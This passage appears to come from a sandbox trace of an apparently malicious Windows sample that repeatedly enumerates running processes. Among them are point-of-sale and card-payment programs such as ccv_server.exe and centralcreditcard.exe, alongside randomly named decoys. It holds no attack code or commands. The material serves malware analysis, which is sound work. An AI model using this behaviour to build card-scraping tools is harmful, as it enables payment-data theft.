th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0258.592] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0258.593] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0258.595] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0258.597] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0258.599] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0258.601] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0258.602] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0258.604] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0258.606] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0258.607] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0258.609] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0258.611] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0258.612] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0258.614] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0258.616] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0258.619] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.621] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.660] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0258.662] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.664] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.666] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0258.667] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0258.669] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0258.670] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.672] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0258.673] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0258.676] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0258.677] CloseHandle (hObject=0x2338) returned 1 [0258.677] Sleep (dwMilliseconds=0x64) [0258.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0258.729] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.730] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.731] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.733] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.734] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.774] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.775] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.776] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.778] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.780] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.781] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.783] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.784] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.786] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.787] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.789] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.790] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.792] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.793] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.795] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.796] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0258.798] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.799] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0258.801] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.802] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0258.804] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0258.805] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0258.807] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0258.856] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0258.857] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0258.859] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.860] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.862] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0258.863] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.865] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.866] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.868] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0258.869] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0258.870] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0258.872] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0258.873] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0258.875] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0258.877] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0258.878] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0258.880] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0258.881] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0258.883] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0258.884] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0258.886] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0258.887] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0258.925] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0258.927] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0258.929] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0258.930] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0258.932] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 